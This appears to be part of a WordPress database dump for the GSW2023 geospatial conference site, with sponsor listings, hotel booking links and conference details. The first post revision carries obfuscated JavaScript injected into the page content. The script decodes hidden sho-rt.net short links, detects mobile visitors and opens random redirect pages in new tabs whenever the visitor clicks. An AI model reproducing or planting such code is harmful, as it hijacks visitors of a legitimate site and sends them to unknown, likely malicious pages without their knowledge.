_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-23 20:49:32','2023-06-23 20:49:32','',3066,'https://gsw2023.com/?p=4757',0,'revision','',0),
(4758,4,'2023-06-23 20:52:12','2023-06-23 20:52:12','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687553155258{margin-top: 0px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"325\" height=\"183\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687389829594{margin-top: 7px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\"> Novotel Cairo El Borg Hotel</span></h4>\n<p><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://cf.bstatic.com/xdata/images/hotel/max1024x768/222745005.jpg?k=18dfdc6ae56119c43bcff6e4a4f7f46814bcc54610f91414d64746d41bc2e9d0&amp;o=&amp;hp=1\" alt=\"Gallery image of this property\" width=\"249\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687390894260{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner 